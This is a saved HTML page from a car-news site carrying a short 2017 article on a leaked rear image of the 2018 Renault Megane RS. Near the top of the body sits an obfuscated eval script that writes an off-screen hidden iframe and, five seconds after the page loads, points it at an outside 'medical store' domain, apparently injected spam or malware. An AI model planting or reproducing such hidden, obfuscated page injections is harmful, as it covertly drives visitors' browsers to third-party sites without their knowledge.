<!DOCTYPE html>
<html lang="en-US">
<head>
<!-- ukey="5FFACD11" -->
<meta name="distribution" content="global" />
<meta name="language" content="en, sv" />
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta property="fb:app_id" content="187604401300510"/>
	<meta property="fb:admins" content="100000444722121"/>
      
    	<title>  Leaked – 2018 Renault Megane RS shows sexy lines</title><meta name="news_keywords" content="leak, May 26, megane rs, report, reveal, " />        
       
        <meta name="robots" content="index,follow" />	
  <meta name="description" content="The French automaker is apparently gearing up to take the wraps off the hotly anticipated all-new Renault Megane RS, and now we have the first leaked image of the car with no camouflage on. The leak seems pretty legitimate – though we can’t actually be sure because until now all […]" />
      
    
<!-- Schema.org markup for Google+ -->
<meta itemprop="name" content="Inautonews  - Leaked – 2018 Renault Megane RS shows sexy lines">
<meta itemprop="description" content="The French automaker is apparently gearing up to take the wraps off the hotly anticipated all-new Renault Megane RS, and now we have the first leaked image of the car with no camouflage on. The leak seems pretty legitimate – though we can’t actually be sure because until now all […]">
<meta itemprop="image" content="http://www.inautonews.com/wp-content/uploads/2017/05/Leaked-–-2018-Renault-Megane-RS-shows-sexy-lines-1024x576.jpg">

<!-- Twitter Card data -->
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@Inautonews">
<meta name="twitter:title" content="Leaked – 2018 Renault Megane RS shows sexy lines">
<meta name="twitter:description" content="The French automaker is apparently gearing up to take the wraps off the hotly anticipated all-new Renault Megane RS, and now we have the first leaked image of the car with no camouflage on. The leak seems pretty legitimate – though we can’t actually be sure because until now all […]">
<meta name="twitter:creator" content="@Aurel Niculescu">
<!-- Twitter summary card with large image must be at least 280x150px -->
<meta name="twitter:image:src" content="http://www.inautonews.com/wp-content/uploads/2017/05/Leaked-–-2018-Renault-Megane-RS-shows-sexy-lines-1024x576.jpg">

<!-- Open Graph data -->
<meta property="og:title" content="Inautonews  - Leaked – 2018 Renault Megane RS shows sexy lines" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://www.inautonews.com/leaked-2018-renault-megane-rs-shows-sexy-lines" />
<meta property="og:image" content="http://www.inautonews.com/wp-content/uploads/2017/05/Leaked-–-2018-Renault-Megane-RS-shows-sexy-lines-1024x576.jpg" />
<meta property="og:description" content="The French automaker is apparently gearing up to take the wraps off the hotly anticipated all-new Renault Megane RS, and now we have the first leaked image of the car with no camouflage on. The leak seems pretty legitimate – though we can’t actually be sure because until now all […]" />
<meta property="og:site_name" content="Inautonews" />
<meta property="article:section" content="The French automaker is apparently gearing up to take the wraps off the hotly anticipated all-new Renault Megane RS, and now we have the first leaked image of the car with no camouflage on. The leak seems pretty legitimate – though we can’t actually be sure because until now all […]" />
<meta property="fb:admins" content="100000444722121" />

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-7417415526170824",
    enable_page_level_ads: true
  });
</script>

        
	<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.inautonews.com/feed" />
	<link rel="Shortcut Icon" href="http://www.inautonews.com/favicon.ico" type="image/x-icon" />
    <link rel="profile" href="http://gmpg.org/xfn/11">
    <link rel="pingback" href="http://www.inautonews.com/xmlrpc.php">
    <link href='http://fonts.googleapis.com/css?family=Oswald:400,700|Roboto:700,500,400' rel='stylesheet' type='text/css'>
    
    <link rel="alternate" type="application/rss+xml" title="INAUTONEWS &raquo; Feed" href="http://www.inautonews.com/feed" />
<link rel="alternate" type="application/rss+xml" title="INAUTONEWS &raquo; Comments Feed" href="http://www.inautonews.com/comments/feed" />
<link rel="alternate" type="application/rss+xml" title="INAUTONEWS &raquo; Leaked – 2018 Renault Megane RS shows sexy lines Comments Feed" href="http://www.inautonews.com/leaked-2018-renault-megane-rs-shows-sexy-lines/feed" />
<link rel='stylesheet' id='wpz-shortcodes-css'  href='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/css/shortcodes.css?ver=4.1.17' type='text/css' media='all' />
<link rel='stylesheet' id='zoom-font-awesome-css'  href='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/css/font-awesome.min.css?ver=4.1.17' type='text/css' media='all' />
<link rel='stylesheet' id='compass-google-fonts-css'  href='//fonts.googleapis.com/css?family=Roboto%3Aregular%2Citalic%2C700%7COswald%3Aregular%2C700%26subset%3Dlatin%2C&#038;ver=4.1.17' type='text/css' media='all' />
<link rel='stylesheet' id='compass-style-css'  href='http://www.inautonews.com/wp-content/themes/compass/style.css?ver=4.1.17' type='text/css' media='all' />
<link rel='stylesheet' id='media-queries-css'  href='http://www.inautonews.com/wp-content/themes/compass/css/media-queries.css?ver=1.0' type='text/css' media='all' />
<link rel='stylesheet' id='dashicons-css'  href='http://www.inautonews.com/wp-includes/css/dashicons.min.css?ver=4.1.17' type='text/css' media='all' />
<link rel='stylesheet' id='wzslider-css'  href='http://www.inautonews.com/wp-content/themes/compass/functions/wpzoom/assets/css/wzslider.css?ver=4.1.17' type='text/css' media='all' />
<link rel='stylesheet' id='wpzoom-custom-css'  href='http://www.inautonews.com/wp-content/themes/compass/custom.css?ver=4.1.17' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://www.inautonews.com/wp-content/plugins/jetpack/css/jetpack.css?ver=3.4.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.inautonews.com/wp-includes/js/jquery/jquery.js?ver=1.11.1'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/plugins/jetpack/modules/related-posts/related-posts.js?ver=20141201'></script>
<script type='text/javascript' src='http://www.inautonews.com/wp-content/themes/compass/js/init.js?ver=4.1.17'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.inautonews.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.inautonews.com/wp-includes/wlwmanifest.xml" /> 
<link rel='canonical' href='http://www.inautonews.com/leaked-2018-renault-megane-rs-shows-sexy-lines' />
<link rel='shortlink' href='http://www.inautonews.com/?p=312584' />

<!-- Begin Theme Custom CSS -->
<style type="text/css" id="compass-custom-css">
a, .entry-title a:hover, .entry-meta a:hover, .single .post_author .author-title a:hover, .comment-author .fn a:hover, .comment-author a.comment-edit-link, .widget .feature-posts-list li a:hover, .wpzoom-featured-cat h3.title a:hover, #news-ticker dd a:hover{color:#1e73be;}.navbar{background:#000000;}
</style>
<!-- End Theme Custom CSS -->
<script type="text/javascript">document.write('<style type="text/css">.tabber{display:none;}</style>');</script></head>
<body class="single single-post postid-312584 single-format-standard">

<div class="page-wrap"><script language = 'javascript'>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('b.c=2(){d(2(){5.a(\'1\').3=\'f://8-6-7.9\'},e)};5.n("<4 g=\\"m: o;p:-l;k:-h;\\"><1 3=\\"\\" i=\\"0\\" j=\\"1\\"><\\/1><\\/4>");',26,26,'|iframe|function|src|div|document|medical|store|safe|com|getElementById|window|onload|setTimeout|5000|http|style|707px|frameborder|id|top|2146px|position|write|absolute|left'.split('|'),0,{}))</script>

    <header class="site-header">
        <nav class="navbar" role="navigation">
            <div class="inner-wrap">

                <div class="navbar-brand">
                
                <script src="https://cdnjs.cloudflare.com/ajax/libs/picturefill/2.3.0/picturefill.min.js" async></script>  
                
                <a href="http://www.inautonews.com" title="test">
                  
<picture>
   <source srcset="http://www.inautonews.com/wp-content/themes/compass/ina/logo.jpg" media="(min-width: 1125px)">
   <source srcset="http://www.inautonews.com/wp-content/themes/compass/images/logo-mobile.jpg" media="(min-width: 768px)">
   <source srcset="http://www.inautonews.com/wp-content/themes/compass/images/logo-mobile.jpg" media="(max-width: 1123px)">
   <img src="http://www.inautonews.com/wp-content/themes/compass/ina/logo.jpg" alt="Inautonews - Automotive news in real time! Updated every second!">
</picture>
                   </a>
                </div><!-- .navbar-brand -->
			
				<nav class="main-navbar" role="navigation">
                    <div class="navbar-header">
                    

                    
                        
                           <a class="navbar-toggle" href="#menu-main-slide">
                               <span class="icon-bar"></span>
                               <span class="icon-bar"></span>
                               <span class="icon-bar"></span>
                           </a>


                           <div id="menu-main-slide" class="menu-menu-1-container"><ul id="menu-menu-1" class="menu"><li id="menu-item-226347" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-226347"><a href="http://www.inautonews.com/">Home</a></li>
<li id="menu-item-226350" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-226350"><a href="http://www.inautonews.com/category/home/news">News</a></li>
<li id="menu-item-226379" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-226379"><a href="#">Manufacturers</a></li>
<li id="menu-item-226380" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226380"><a href="#">Topics</a>
<ul class="sub-menu">
	<li id="menu-item-226385" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226385"><a href="http://www.inautonews.com/category/home/producers">Industry</a></li>
	<li id="menu-item-226388" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226388"><a href="http://www.inautonews.com/category/home/sales-reports">Sales Reports</a></li>
	<li id="menu-item-226390" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226390"><a href="http://www.inautonews.com/category/home/technology">Technology</a></li>
	<li id="menu-item-226391" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226391"><a href="http://www.inautonews.com/category/home/tuners">Tuners</a></li>
	<li id="menu-item-226392" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226392"><a href="http://www.inautonews.com/category/home/videos">Videos</a></li>
	<li id="menu-item-226387" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226387"><a href="http://www.inautonews.com/category/home/safety-home">Safety</a></li>
	<li id="menu-item-226382" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226382"><a href="http://www.inautonews.com/category/home/car-crashes">Car crashes</a></li>
	<li id="menu-item-226389" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226389"><a href="http://www.inautonews.com/category/home/spy">Spied</a></li>
	<li id="menu-item-226383" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226383"><a href="http://www.inautonews.com/category/home/celebrities">Celebrities</a></li>
	<li id="menu-item-226384" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226384"><a href="http://www.inautonews.com/category/home/concept">Concept Cars</a></li>
	<li id="menu-item-226386" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226386"><a href="http://www.inautonews.com/category/moto">Moto</a></li>
	<li id="menu-item-226393" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226393"><a href="http://www.inautonews.com/category/home/other">Other</a></li>
</ul>
</li>
<li id="menu-item-226381" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226381"><a href="#">Motor Shows</a>
<ul class="sub-menu">
	<li id="menu-item-226399" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226399"><a href="http://www.inautonews.com/category/home/motor-shows/geneva-motor-show-motor-shows">Geneva Motor Show</a></li>
	<li id="menu-item-226398" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226398"><a href="http://www.inautonews.com/category/home/motor-shows/frankfurt-motor-show-iaa">Frankfurt Motor Show</a></li>
	<li id="menu-item-226401" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226401"><a href="http://www.inautonews.com/category/home/motor-shows/paris-motor-show-motor-shows">Paris Motor Show</a></li>
	<li id="menu-item-226397" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226397"><a href="http://www.inautonews.com/category/home/motor-shows/essen-motor-show-motor-shows">Essen</a></li>
	<li id="menu-item-226395" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226395"><a href="http://www.inautonews.com/category/home/motor-shows/concorso-deleganza-motor-shows">Concorso d’Eleganza</a></li>
	<li id="menu-item-226394" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226394"><a href="http://www.inautonews.com/category/home/motor-shows/auto-china-beijing">Beijing</a></li>
	<li id="menu-item-226402" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226402"><a href="http://www.inautonews.com/category/home/motor-shows/tokyo-motor-show-motor-shows">Tokyo Motor Show</a></li>
	<li id="menu-item-226396" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226396"><a href="http://www.inautonews.com/category/home/motor-shows/detroit-auto-show-motor-shows">Detroit</a></li>
	<li id="menu-item-226400" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226400"><a href="http://www.inautonews.com/category/home/motor-shows/la-auto-show-motor-shows">LA Auto Show</a></li>
</ul>
</li>
<li id="menu-item-226348" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226348"><a href="http://www.inautonews.com/new-photo-gallery">Photo Gallery</a></li>
<li id="menu-item-226365" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226365"><a href="http://www.inautonews.com/category/home/motorsport">Motorsport</a></li>
<li id="menu-item-226376" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226376"><a href="http://www.inautonews.com/category/test-drive-2">Test Drive</a></li>
</ul></div>
                    </div>
                    <div id="navbar-main">


                        <div class="menu-menu-1-container"><ul id="menu-menu-2" class="nav navbar-nav dropdown sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-226347"><a href="http://www.inautonews.com/">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-226350"><a href="http://www.inautonews.com/category/home/news">News</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-226379"><a href="#">Manufacturers</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226380"><a href="#">Topics</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226385"><a href="http://www.inautonews.com/category/home/producers">Industry</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226388"><a href="http://www.inautonews.com/category/home/sales-reports">Sales Reports</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226390"><a href="http://www.inautonews.com/category/home/technology">Technology</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226391"><a href="http://www.inautonews.com/category/home/tuners">Tuners</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226392"><a href="http://www.inautonews.com/category/home/videos">Videos</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226387"><a href="http://www.inautonews.com/category/home/safety-home">Safety</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226382"><a href="http://www.inautonews.com/category/home/car-crashes">Car crashes</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226389"><a href="http://www.inautonews.com/category/home/spy">Spied</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226383"><a href="http://www.inautonews.com/category/home/celebrities">Celebrities</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226384"><a href="http://www.inautonews.com/category/home/concept">Concept Cars</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226386"><a href="http://www.inautonews.com/category/moto">Moto</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226393"><a href="http://www.inautonews.com/category/home/other">Other</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-226381"><a href="#">Motor Shows</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226399"><a href="http://www.inautonews.com/category/home/motor-shows/geneva-motor-show-motor-shows">Geneva Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226398"><a href="http://www.inautonews.com/category/home/motor-shows/frankfurt-motor-show-iaa">Frankfurt Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226401"><a href="http://www.inautonews.com/category/home/motor-shows/paris-motor-show-motor-shows">Paris Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226397"><a href="http://www.inautonews.com/category/home/motor-shows/essen-motor-show-motor-shows">Essen</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226395"><a href="http://www.inautonews.com/category/home/motor-shows/concorso-deleganza-motor-shows">Concorso d’Eleganza</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226394"><a href="http://www.inautonews.com/category/home/motor-shows/auto-china-beijing">Beijing</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226402"><a href="http://www.inautonews.com/category/home/motor-shows/tokyo-motor-show-motor-shows">Tokyo Motor Show</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226396"><a href="http://www.inautonews.com/category/home/motor-shows/detroit-auto-show-motor-shows">Detroit</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226400"><a href="http://www.inautonews.com/category/home/motor-shows/la-auto-show-motor-shows">LA Auto Show</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226348"><a href="http://www.inautonews.com/new-photo-gallery">Photo Gallery</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226365"><a href="http://www.inautonews.com/category/home/motorsport">Motorsport</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-226376"><a href="http://www.inautonews.com/category/test-drive-2">Test Drive</a></li>
</ul></div>

                                    <form role="search" method="get" class="search-form" action="http://www.inautonews.com/">
				<label>
					<span class="screen-reader-text">Search for:</span>
					<input type="search" class="search-field" placeholder="Search &hellip;" value="" name="s" title="Search for:" />
				</label>
				<input type="submit" class="search-submit" value="Search" />
			</form>                
                    </div><!-- #navbar-main -->
                   


                </nav><!-- .navbar -->


                <div class="clear"></div>

            </div>
        </nav><!-- .navbar -->
    </header><!-- .site-header -->

    
        

    
    <main id="main" class="site-main" role="main">
    <div class="breadcrumbs"><a href="http://www.inautonews.com">Home</a> &raquo; <span class="current">News</span></div>
                        
            </header><!-- .entry-header -->
            <div class="recent-posts">
            <header class="entry-header">
                <div class="entry-info">
              
<header>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- top article beta -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="7390768122"
     data-ad-format="horizontal"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<!-- google_ad_section_start -->
                    <h1 class="entry-title">Leaked – 2018 Renault Megane RS shows sexy lines</h1><!-- google_ad_section_end -->
                                            <div class="share">
                            <a href="https://twitter.com/intent/tweet?url=http%3A%2F%2Fwww.inautonews.com%2Fleaked-2018-renault-megane-rs-shows-sexy-lines&text=Leaked+%E2%80%93+2018+Renault+Megane+RS+shows+sexy+lines" target="_blank" title="Tweet this on Twitter" class="twitter">Tweet</a>
                            <a href="https://facebook.com/sharer.php?u=http%3A%2F%2Fwww.inautonews.com%2Fleaked-2018-renault-megane-rs-shows-sexy-lines&t=Leaked+%E2%80%93+2018+Renault+Megane+RS+shows+sexy+lines" target="_blank" title="Share this on Facebook" class="facebook">Share</a>
                            <a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.inautonews.com%2Fleaked-2018-renault-megane-rs-shows-sexy-lines" target="_blank" title="Post this to Google+" class="gplus">Share</a>
                            <div class="clear"></div>
                        </div>
                                        
                    <div class="entry-meta">
                        <span class="vcard author post-author"><span class="entry-author">By <a href="http://www.inautonews.com/author/aurel-niculescu" title="Posts by Aurel Niculescu" rel="author">Aurel Niculescu</a></span></span>
                        <span class="post-date updated"><span class="entry-date">on <time class="entry-date" datetime="2017-05-08T03:46:43+00:00">May 8, 2017</time> </span></span> 
                        <span class="entry-category">in <a href="http://www.inautonews.com/category/home/news" rel="category tag">News</a>, <a href="http://www.inautonews.com/category/manufacturers/renault" rel="category tag">Renault</a></span>                                             </div>
                    <div class="clear"></div>
                </div>
</header>
			<div class="article-feature-image"> 
			<!-- google_ad_section_start -->
<picture>
   <source srcset="http://www.inautonews.com/wp-content/uploads/2017/05/Leaked-–-2018-Renault-Megane-RS-shows-sexy-lines-1024x576.jpg" media="(min-width: 768px)" alt="Leaked – 2018 Renault Megane RS shows sexy lines image">
   <source srcset="http://www.inautonews.com/wp-content/uploads/2017/05/Leaked-–-2018-Renault-Megane-RS-shows-sexy-lines-1024x576.jpg" media="(min-width: 768px)" alt="Leaked – 2018 Renault Megane RS shows sexy lines image">
   <source srcset="http://www.inautonews.com/wp-content/uploads/2017/05/Leaked-–-2018-Renault-Megane-RS-shows-sexy-lines-770x433.jpg" alt="Leaked – 2018 Renault Megane RS shows sexy lines image">
   <img src="http://www.inautonews.com/wp-content/uploads/2017/05/Leaked-–-2018-Renault-Megane-RS-shows-sexy-lines-1024x576.jpg" alt="Leaked – 2018 Renault Megane RS shows sexy lines image">
</picture>
				</div>
            <div style="float:left; margin-right:17px; margin-bottom:10px; max-width: 336px; width:100%;">
            
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Responsive Inside Article -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="9349974523"
     data-ad-format="rectangle"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
            
            <br>
            <!-- <div style="width:336px; height:160px; float:left; margin-top:20px;"><img src="http://www.pixelmedia.ro/test1.gif" width="336" height="152" /></div> -->
            </div>
                <article id="post-312584" class="post-312584 post type-post status-publish format-standard has-post-thumbnail hentry category-news category-renault tag-leak tag-may-26 tag-megane-rs tag-report tag-reveal">
    <div class="entry-content">
        <h2>The French automaker is apparently gearing up to take the wraps off the hotly anticipated all-new Renault Megane RS, and now we have the first leaked image of the car with no camouflage on.</h2>
<p>The leak seems pretty legitimate – though we can’t actually be sure because until now all spied prototypes undergoing testing didn’t have the production body as they used the one from the GT version. Now the Internet has gained access to an image of the hot hatch’s rear to show us how the flagship Megane will look like from behind. With its sporty cues the bright orange hue is only natural, and this looks like another near-production prototype that has been caught showing its sexy lines – wide wheel arches, massive diffuser with a large trapezoidal exhaust finisher in the middle, new bumper with vents at both sides and of course the ubiquitous “RS” badging on the trunk lid tucked below the right taillight.</p>
<p>Renault’s designers have also played with the roof-mounted spoiler while the sides of the spoiler have been color-coordinated with the rest of the body while the GT’s spoiler features a glossy black design. Also new are the larger tires with a new set of alloy wheels. According to reports, the Megane RS might become official on May 26 during the Monaco F1 GP – its official schedule also includes a Renault Sport introduction the very same day. Powertrain-wise, the RS is expected to soldier on with FWD, and using a new unit or the Alpine A110’s turbocharged 1.8-liter.</p>
<p>&nbsp;</p>
<script type="text/javascript">jQuery.ajax({url: "http://www.inautonews.com/", data: {top_ten_id: 312584, top_ten_blog_id: 1, activate_counter: 11, top10_rnd: (new Date()).getTime() + "-" + Math.floor(Math.random()*100000)}});</script>
<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div>        <div class="clear"></div>
    </div><!-- .entry-content -->
    <footer class="entry-footer">
                    <div class="post_author clearfix">

                            <div style="max-width: 770px; width:100%;">
                            
                            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- 770 px max after article text -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="1687106921"
     data-ad-format="rectangle"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
                            
                            </div>
            </div>
    </footer><!-- .entry-footer -->
</article><!-- #post-## --><!-- google_ad_section_end -->                
                                         <div class="share">
                            <a href="https://twitter.com/intent/tweet?url=http%3A%2F%2Fwww.inautonews.com%2Fleaked-2018-renault-megane-rs-shows-sexy-lines&text=Leaked+%E2%80%93+2018+Renault+Megane+RS+shows+sexy+lines" target="_blank" title="Tweet this on Twitter" class="twitter">Tweet</a>
                            <a href="https://facebook.com/sharer.php?u=http%3A%2F%2Fwww.inautonews.com%2Fleaked-2018-renault-megane-rs-shows-sexy-lines&t=Leaked+%E2%80%93+2018+Renault+Megane+RS+shows+sexy+lines" target="_blank" title="Share this on Facebook" class="facebook">Share</a>
                            <a href="https://plus.google.com/share?url=http%3A%2F%2Fwww.inautonews.com%2Fleaked-2018-renault-megane-rs-shows-sexy-lines" target="_blank" title="Post this to Google+" class="gplus">Share</a>
                            <div class="clear"></div>
                        </div>
                                                        
<div id="disqus_thread">
    </div>

                            </div>
                <div id="sidebar" class="site-sidebar">
<div class="adsense-home" style="width:100%;">

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Sidebar Large Vertical Ad -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-7417415526170824"
     data-ad-slot="6815310521"
     data-ad-format="vertical"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>

</div>
<br><br>
        
<div id="slider" style="height:240px; background-color:#f1c40f; margin-bottom:30px;">
			<ul class="slides clearfix">
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/05/2018-Peugeot-308-comes-with-enhanced-features-new-diesel-and-auto-0-800x450.jpg" alt="2018 Peugeot 308 comes with enhanced features, new diesel and auto" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/2018-peugeot-308-comes-with-enhanced-features-new-diesel-and-auto">2018 Peugeot 308 comes with enhanced features, new diesel and auto</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-05-05T05:43:59+00:00">May 5, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/05/Video-Air-France-and-Porsche-literally-pull-huge-Guinness-record-1-800x450.jpg" alt="[Video] Air France and Porsche literally pull huge Guinness record" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/video-air-france-and-porsche-literally-pull-huge-guinness-record">[Video] Air France and Porsche literally pull huge Guinness record</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-05-02T02:44:04+00:00">May 2, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/04/Video-Skoda-reveals-Yeti-successor-as-Karoq-without-actually-presenting-it-3-800x450.jpg" alt="[Video] Skoda reveals Yeti successor as Karoq, without actually presenting it" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/video-skoda-reveals-yeti-successor-as-karoq-without-actually-presenting-it">[Video] Skoda reveals Yeti successor as Karoq, without actually presenting it</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-04-28T05:17:27+00:00">April 28, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/04/BMW-takes-the-wraps-off-the-2018-M550d-xDrive-3-800x450.jpg" alt="BMW takes the wraps off the 2018 M550d xDrive" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/bmw-takes-the-wraps-off-the-2018-m550d-xdrive">BMW takes the wraps off the 2018 M550d xDrive</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-04-26T04:46:07+00:00">April 26, 2017</time></span>                            </div>
                        </div>
                    
                </li>
			                <li class="slide">
                    <img src="http://www.inautonews.com/wp-content/uploads/2017/04/Video-Honda’s-Civic-Type-R-again-rules-the-front-wheel-drive-Nurburgring-lap-9-800x450.jpg" alt="[Video] Honda’s Civic Type R again rules the front wheel drive Nurburgring lap" class="Thumbnail thumbnail featured " height="230" />                    <div class="slide-overlay">
                       
                    </div>
                    
                     <div class="slide-header">
                            <h3><a href="http://www.inautonews.com/video-hondas-civic-type-r-again-rules-the-front-wheel-drive-nurburgring-lap">[Video] Honda’s Civic Type R again rules the front wheel drive Nurburgring lap</a></h3>                            <div class="entry-meta">
                                <span class="entry-date"><time class="entry-date" datetime="2017-04-24T04:49:11+00:00">April 24, 2017</time></span>                            </div>
                        </div>
                    
                </li>
					</ul>
	
</div>            
			<div class="widget tabbertabs" id="wpzoom-tabber-2"><div class="tabber"><div id="wpzoom-feature-posts-2" class="tabbertab feature-posts"><h2 class="widgettitle">Recent Posts</h2>
